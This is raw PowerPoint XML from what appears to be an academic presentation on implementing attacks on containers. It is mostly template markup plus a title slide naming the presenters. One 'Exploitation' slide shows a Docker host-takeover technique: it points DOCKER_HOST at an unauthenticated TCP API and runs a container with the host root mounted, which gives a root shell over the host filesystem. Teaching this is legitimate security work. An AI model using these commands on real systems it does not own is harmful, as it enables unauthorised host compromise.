                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0CE529F-F217-C840-EE9F-720B5BC26C14}"/>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8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15ECD78B-9E34-A30B-3809-D1387CA0FDDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AD62E69-1A56-2104-432A-BEF8E7EB918E}"/>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76098593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656E-9749-5A48-C86B-F17A50896745}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC454295-E73E-F24F-9D24-03FB61DB860F}"/>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4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12BA055C-BDDB-2143-E6D2-24229D8E98E3}"/>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B957058-6F9B-376C-1362-6210CA843834}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="52535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6730F-6740-9375-32DF-C7CDEE2FFBE8}"/>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3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B695444D-6A32-5311-0745-4D0DC4AA12C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16F9F17C-10C3-56C5-CBFA-79F2FEC858F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="206935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E912-7776-7B4E-05AA-C02FA73247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Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CC6A9CC-3862-6A3A-4B1E-494F3E01C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Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17358D6B-0021-2B7B-69AB-0C0F3707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F9761-2812-850F-9022-C7B0E3CAF3D4}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73F484EA-1ACF-54D7-D9C8-1A93BB10F6FD}"/>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3830099E-C36B-63AA-6D20-AC0F88CD0BC8}"/>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176854939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C3C5-5D34-D467-0616-A3AE0E069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A"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Picture Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F973DDB9-9308-812C-5580-31D404A01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A"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03B69BFC-C69B-7F12-6FC4-3831ACD4D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707F5-0338-701F-5653-07AFF8AD26F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AE0A9D01-5434-F249-8D4C-E29E87207DE1}" type="datetimeFigureOut">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>04/09/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9218377A-0131-F851-255C-B8D7D630E8BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5387A18-B424-EC67-BE4A-301AD11AF7C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32043304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691745-A7B6-CC4F-FEC1-8771401C7B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A"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72BED879-138B-66C5-8634-517FE4EE3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Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F24217CC-407A-59AB-0179-F56347B71C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0A9D01-5434-F249-8D4C-E29E87207DE1}" type="datetimeFigureOut">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>04/09/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{808B3159-A1C0-CBA9-1C19-E5459E68C2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A"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{913C3A7C-53CC-0E22-393B-A32616DF5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07522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138098998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ocker/rootfs.git#ref:subDi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k21academy.com/docker-kubernetes/what-are-container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EC62-6303-EC86-BE94-E4954F0C052E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1746422" y="1161495"/>
            <a:ext cx="9144000" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Implementing Recent Attacks and a Security Application on</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000">
                <a:effectLst/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Containers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FDAE1F2-778F-015D-815C-A9070A6D6876}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1629104" y="4040743"/>
            <a:ext cx="9144000" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Presented By:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Rakshith</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Raj </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Gurupura</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Puttaraju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, Hasan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Islam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shaffy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> , Tariq </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Houis</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Fahimeh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Rezaei</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shafayat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Hossain Majumder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Piyush Adhikari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sourov</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Jajodia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mary Acquah</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1493044-9F86-11BF-F9BA-C13C80E3C387}"/>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733812B4-9CF4-E3E7-13C7-AFBCD376B959}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="706203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4A88-ADC1-AB67-504E-BF8BDD0C01EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6786009-07B5-72F2-2F27-88621D763AF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t>Default the API for all connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SA" sz="1800">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
              </a:rPr>
              <a:t>export DOCKER_HOST=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
              </a:rPr>
              <a:t>://127.0.0.1:2375</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SA" sz="1800">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t>Create an image, mount host’s root directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ocker run -it -v /:/host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ubuntu:latest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> bash</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA">
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1BC1DC3-7671-4218-FA79-DC16C0493497}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="125659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4A88-ADC1-AB67-504E-BF8BDD0C01EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6786009-07B5-72F2-2F27-88621D763AF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-SA">
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
